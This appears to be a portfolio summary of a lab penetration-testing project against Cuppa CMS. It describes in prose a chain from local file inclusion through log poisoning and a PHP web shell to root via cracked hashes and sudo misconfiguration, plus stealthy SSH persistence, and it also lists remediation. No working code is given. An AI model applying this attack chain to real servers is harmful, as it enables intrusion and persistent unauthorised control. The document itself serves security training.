Overview

Alpha Attack is a technical research project focused on dissecting and exploiting legacy web application vulnerabilities within Cuppa CMS. The project demonstrates a “Kill Chain” methodology, moving systematically from initial reconnaissance to total system compromise.

The primary objective was to validate the impact of improper input sanitization in PHP applications and demonstrate how a seemingly minor file inclusion flaw can be leveraged to gain full administrative control over a server.

Problem

Web applications, particularly those running legacy codebases like specific versions of Cuppa CMS, often fail to strictly validate user input. The target system exhibited a critical Local File Inclusion (LFI) vulnerability, allowing unauthenticated users to read arbitrary files on the server. The challenge was to demonstrate the severity of this flaw by escalating it beyond simple information disclosure.

Solution

The exploitation strategy followed a structured attack vector:

  1. Vulnerability Identification: utilized automated scanners (OWASP ZAP) and manual verification to locate the LFI entry point in the CMS configuration files.
  2. Weaponization (LFI to RCE): Leveraged PHP wrappers and log poisoning techniques to inject a PHP web shell, converting the file inclusion vulnerability into Remote Code Execution (RCE).
  3. Privilege Escalation: Post-compromise enumeration revealed weak user permissions. Used John the Ripper to crack extracted password hashes and exploited misconfigured sudo rights to elevate privileges to Root.

Technologies

  • Reconnaissance: Nmap (Network mapping), OWASP ZAP (Vulnerability scanning).
  • Exploitation: Bash (Payload automation), PHP (Web shell construction).
  • Post-Exploitation: John the Ripper (Password Cracking), Linux System Internals (Privilege Escalation).

Key Features

  • Reproducible Exploit Chain: Documented a step-by-step path from zero access to root.
  • Custom Payloads: Developed sanitized PHP payloads designed to bypass basic filters.
  • Persistence: Established stealthy SSH access for maintained control after the initial exploit.
  • Reporting: Created a professional vulnerability assessment report detailing remediation steps (Input Validation, Disable Dangerous PHP Functions).

Results

  • Critical Impact: Successfully demonstrated total system compromise starting from a single HTTP request.
  • Root Access: Achieved uid=0(root) privileges within the lab environment.
  • Remediation: Provided actionable code patches to sanitize the $_REQUEST parameters in the vulnerable PHP script.